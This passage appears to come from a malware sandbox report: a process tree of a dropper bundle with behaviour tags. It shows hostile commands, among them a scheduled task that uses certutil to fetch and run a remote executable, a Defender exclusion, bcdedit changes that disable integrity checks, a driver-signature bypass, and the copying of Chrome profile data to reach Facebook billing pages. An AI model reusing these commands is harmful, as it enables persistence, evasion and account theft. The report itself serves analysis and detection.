- Loads dropped DLL
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4136

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
10⤵
PID:5280

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
11⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:4760

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
10⤵
PID:5472

C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
11⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:6368

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
10⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:7404

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
10⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:7204

C:\Users\Admin\AppData\Local\Temp\bs3yzbtihai\IBInstaller_97039.exe
"C:\Users\Admin\AppData\Local\Temp\bs3yzbtihai\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1944

C:\Users\Admin\AppData\Local\Temp\is-5R50G.tmp\IBInstaller_97039.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5R50G.tmp\IBInstaller_97039.tmp" /SL5="$1037A,14455514,721408,C:\Users\Admin\AppData\Local\Temp\bs3yzbtihai\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4184

C:\Users\Admin\AppData\Local\Temp\is-M81SA.tmp\{app}\chrome_proxy.exe
"C:\Users\Admin\AppData\Local\Temp\is-M81SA.tmp\{app}\chrome_proxy.exe"
10⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4960

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-M81SA.tmp\{app}\chrome_proxy.exe"
11⤵
PID:3264

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 4
12⤵
- Runs ping.exe
PID:7024

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
10⤵
- Checks computer location settings
PID:4928

C:\Users\Admin\AppData\Local\Temp\ooordyxwgzh\chashepro3.exe
"C:\Users\Admin\AppData\Local\Temp\ooordyxwgzh\chashepro3.exe" /VERYSILENT
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4832

C:\Users\Admin\AppData\Local\Temp\rurfzhx4e5x\fnjsn5pirwa.exe
"C:\Users\Admin\AppData\Local\Temp\rurfzhx4e5x\fnjsn5pirwa.exe" testparams
8⤵
- Executes dropped EXE
PID:4792

C:\Users\Admin\AppData\Roaming\sfue5y3ixus\fnoy3fxu0qu.exe
"C:\Users\Admin\AppData\Roaming\sfue5y3ixus\fnoy3fxu0qu.exe" /VERYSILENT /p=testparams
9⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5776

C:\Users\Admin\AppData\Local\Temp\is-RS89S.tmp\fnoy3fxu0qu.tmp
"C:\Users\Admin\AppData\Local\Temp\is-RS89S.tmp\fnoy3fxu0qu.tmp" /SL5="$3020E,536425,199680,C:\Users\Admin\AppData\Roaming\sfue5y3ixus\fnoy3fxu0qu.exe" /VERYSILENT /p=testparams
10⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:5872

C:\Users\Admin\AppData\Local\Temp\4ntnpmxkqji\sfnenv0wjj2.exe
"C:\Users\Admin\AppData\Local\Temp\4ntnpmxkqji\sfnenv0wjj2.exe" /ustwo INSTALL
8⤵
- Executes dropped EXE
PID:2768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 652
9⤵
- Drops file in Windows directory
- Program crash
PID:6016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 672
9⤵
- Program crash
PID:5988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 804
9⤵
- Program crash
PID:4816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 788
9⤵
- Program crash
PID:6284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 872
9⤵
- Program crash
PID:6496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 924
9⤵
- Program crash
PID:6864

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1192
9⤵
- Program crash
PID:6988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1156
9⤵
- Program crash
PID:7108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 1208
9⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:1264

C:\Users\Admin\AppData\Local\Temp\00meux1beua\vict.exe
"C:\Users\Admin\AppData\Local\Temp\00meux1beua\vict.exe" /VERYSILENT /id=535
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4576

C:\Users\Admin\AppData\Local\Temp\k4jajlvqpyu\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\k4jajlvqpyu\Setup3310.exe" /Verysilent /subid=577
8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4580

C:\Users\Admin\AppData\Local\Temp\wjm4tnblbfl\app.exe
"C:\Users\Admin\AppData\Local\Temp\wjm4tnblbfl\app.exe" /8-23
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:2020

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Floral-Hill"
9⤵
PID:3848

C:\Program Files (x86)\Floral-Hill\7za.exe
"C:\Program Files (x86)\Floral-Hill\7za.exe" e -p154.61.71.51 winamp-plugins.7z
9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:6404

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Floral-Hill\app.exe" -map "C:\Program Files (x86)\Floral-Hill\WinmonProcessMonitor.sys""
9⤵
PID:5508

C:\Program Files (x86)\Floral-Hill\app.exe
"C:\Program Files (x86)\Floral-Hill\app.exe" -map "C:\Program Files (x86)\Floral-Hill\WinmonProcessMonitor.sys"
10⤵
- Drops file in Program Files directory
- Suspicious behavior: LoadsDriver
PID:5492

C:\Program Files (x86)\Floral-Hill\7za.exe
"C:\Program Files (x86)\Floral-Hill\7za.exe" e -p154.61.71.51 winamp.7z
9⤵
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:7328

C:\Program Files (x86)\Floral-Hill\app.exe
"C:\Program Files (x86)\Floral-Hill\app.exe" /8-23
9⤵
PID:3760

C:\Program Files (x86)\Floral-Hill\app.exe
"C:\Program Files (x86)\Floral-Hill\app.exe" /8-23
10⤵
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:7124

C:\Windows\System32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
11⤵
PID:5900

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
12⤵
- Modifies data under HKEY_USERS
PID:5372

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /8-23
11⤵
- Drops file in Drivers directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:5920

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
12⤵
- Creates scheduled task(s)
PID:5032

C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://fotamene.com/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
12⤵
- Creates scheduled task(s)
PID:4472

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
12⤵
- Loads dropped DLL
PID:4588

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
13⤵
- Modifies boot configuration data using bcdedit
PID:7216

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
13⤵
- Modifies boot configuration data using bcdedit
PID:7808

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
13⤵
- Modifies boot configuration data using bcdedit
PID:1360

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
13⤵
- Modifies boot configuration data using bcdedit
PID:6344

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
13⤵
- Modifies boot configuration data using bcdedit
PID:5768

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
13⤵
- Modifies boot configuration data using bcdedit
PID:6248

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
13⤵
- Modifies boot configuration data using bcdedit
PID:7280

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
13⤵
- Modifies boot configuration data using bcdedit
PID:4824

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
13⤵
- Modifies boot configuration data using bcdedit
PID:6532

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
14⤵
PID:5152

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
13⤵
- Modifies boot configuration data using bcdedit
PID:8032

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
13⤵
- Modifies boot configuration data using bcdedit
PID:7472

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
13⤵
- Modifies boot configuration data using bcdedit
PID:7692

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
13⤵
- Modifies boot configuration data using bcdedit
PID:7612

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set bootmenupolicy legacy
13⤵
- Modifies boot configuration data using bcdedit
PID:4296

C:\Windows\System32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
12⤵
- Modifies boot configuration data using bcdedit
PID:7176

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
12⤵
- Drops file in Drivers directory
PID:3732

C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
12⤵
PID:7956

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
13⤵
PID:6880

C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
14⤵
PID:6944

C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe
C:\Users\Admin\AppData\Local\Temp\csrss\ww31.exe
12⤵
PID:11204

C:\Users\Admin\AppData\Local\Temp\b3kfq0yjp1t\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\b3kfq0yjp1t\askinstall24.exe"
8⤵
- Drops Chrome extension
PID:6224

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
9⤵
PID:8008

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
10⤵
- Kills process with taskkill
PID:1428

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y
9⤵
- Enumerates system info in registry
PID:7924

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
9⤵
PID:6744

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xf0,0xf4,0xf8,0xcc,0xa0,0x7ffb56fa6e00,0x7ffb56fa6e10,0x7ffb56fa6e20
10⤵
PID:7932

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1492,18386421970527197247,2227664711944643680,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1660 /prefetch:8
10⤵
PID:6320

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1492,18386421970527197247,2227664711944643680,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=2288 /prefetch:8
10⤵
PID:6096

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1492,18386421970527197247,2227664711944643680,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1568 /prefetch:2
10⤵
PID:5440

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1492,18386421970527197247,2227664711944643680,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2828 /prefetch:1
10⤵
PID:7420

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1492,18386421970527197247,2227664711944643680,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2816 /prefetch:1
10⤵
PID:500

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1492,18386421970527197247,2227664711944643680,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
10⤵
PID:1268

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1492,18386421970527197247,2227664711944643680,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1
10⤵
PID:4764

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1492,18386421970527197247,2227664711944643680,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3624 /prefetch:1
10⤵
PID:4452

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1492,18386421970527197247,2227664711944643680,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3888 /prefetch:1
10⤵
PID:1276

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1492,18386421970527197247,2227664711944643680,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=4812 /prefetch:8
10⤵
PID:6724

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1492,18386421970527197247,2227664711944643680,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=2088 /prefetch:2
10⤵
PID:8000

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1492,18386421970527197247,2227664711944643680,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=5556 /prefetch:8
10⤵
PID:6588

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1492,18386421970527197247,2227664711944643680,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=4784 /prefetch:8
10⤵
PID:1292

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1492,18386421970527197247,2227664711944643680,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=5864 /prefetch:8
10⤵
PID:7588

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1492,18386421970527197247,2227664711944643680,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=5868 /prefetch:8
10⤵
PID:7828

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1492,18386421970527197247,2227664711944643680,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=5044 /prefetch:8
10⤵
PID:1052

C:\Users\Admin\AppData\Local\Temp\jixffobylsf\dpi3x1hoyne.exe
"C:\Users\Admin\AppData\Local\Temp\jixffobylsf\dpi3x1hoyne.exe" /ustwo INSTALL
8⤵
PID:7452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7452 -s 652
9⤵
- Program crash
PID:384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7452 -s 668
9⤵
- Program crash
PID:1136

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7452 -s 768
9⤵
- Program crash
PID:1648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7452 -s 804
9⤵
- Program crash
PID:3164

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7452 -s 884
9⤵
- Program crash
PID:996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7452 -s 932
9⤵
- Program crash
PID:7436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7452 -s 1180
9⤵
- Program crash
PID:5380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7452 -s 1192
9⤵
- Program crash
PID:4288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7452 -s 1284
9⤵
- Program crash
PID:4432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7452 -s 1296
9⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:7376

C:\Users\Admin\AppData\Local\Temp\0jxzzbhnexz\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\0jxzzbhnexz\Setup3310.exe" /Verysilent /subid=577
8⤵
PID:4116

C:\Users\Admin\AppData\Local\Temp\is-GS6QV.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GS6QV.tmp\Setup3310.tmp" /SL5="$50304,802346,56832,C:\Users\Admin\AppData\Local\Temp\0jxzzbhnexz\Setup3310.exe" /Verysilent /subid=577
9⤵
- Loads dropped DLL
PID:4968

C:\Users\Admin\AppData\Local\Temp\is-OG3CV.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-OG3CV.tmp\Setup.exe" /Verysilent
10⤵
PID:4868

C:\Users\Admin\AppData\Local\Temp\is-L86DA.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-L86DA.tmp\Setup.tmp" /SL5="$80212,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-OG3CV.tmp\Setup.exe" /Verysilent
11⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:7280

C:\Users\Admin\AppData\Local\Temp\is-6KG9Q.tmp\ProPlugin.exe
"C:\Users\Admin\AppData\Local\Temp\is-6KG9Q.tmp\ProPlugin.exe" /Verysilent
12⤵
- Checks computer location settings
PID:7064

C:\Users\Admin\AppData\Local\Temp\is-V4UQ6.tmp\ProPlugin.tmp
"C:\Users\Admin\AppData\Local\Temp\is-V4UQ6.tmp\ProPlugin.tmp" /SL5="$3051E,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-6KG9Q.tmp\ProPlugin.exe" /Verysilent
13⤵
- Loads dropped DLL
PID:7688

C:\Users\Admin\AppData\Local\Temp\is-HD4MS.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-HD4MS.tmp\Setup.exe"
14⤵
PID:4676

C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"
15⤵
- Loads dropped DLL
PID:3452

C:\Users\Admin\AppData\Local\Temp\is-6KG9Q.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-6KG9Q.tmp\Delta.exe" /Verysilent
12⤵
PID:6664

C:\Users\Admin\AppData\Local\Temp\is-L2IPO.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-L2IPO.tmp\Delta.tmp" /SL5="$505C4,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-6KG9Q.tmp\Delta.exe" /Verysilent
13⤵
- Loads dropped DLL
PID:5592

C:\Users\Admin\AppData\Local\Temp\is-LD11S.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-LD11S.tmp\Setup.exe" /VERYSILENT
14⤵
- Loads dropped DLL
- Checks processor information in registry
PID:5552

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-LD11S.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
15⤵
PID:6512

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Setup.exe /f
16⤵
- Kills process with taskkill
PID:7224

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
16⤵
- Delays execution with timeout.exe
PID:6080

C:\Users\Admin\AppData\Local\Temp\is-6KG9Q.tmp\zznote.exe
"C:\Users\Admin\AppData\Local\Temp\is-6KG9Q.tmp\zznote.exe" /Verysilent
12⤵
PID:7728

C:\Users\Admin\AppData\Local\Temp\is-EIK0K.tmp\zznote.tmp
"C:\Users\Admin\AppData\Local\Temp\is-EIK0K.tmp\zznote.tmp" /SL5="$605C4,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-6KG9Q.tmp\zznote.exe" /Verysilent
13⤵
- Loads dropped DLL
PID:5800

C:\Users\Admin\AppData\Local\Temp\is-ADDVL.tmp\jg4_4jaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-ADDVL.tmp\jg4_4jaa.exe" /silent
14⤵
- Checks whether UAC is enabled
PID:4428

C:\Users\Admin\AppData\Local\Temp\is-6KG9Q.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-6KG9Q.tmp\hjjgaa.exe" /Verysilent
12⤵
PID:4612

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
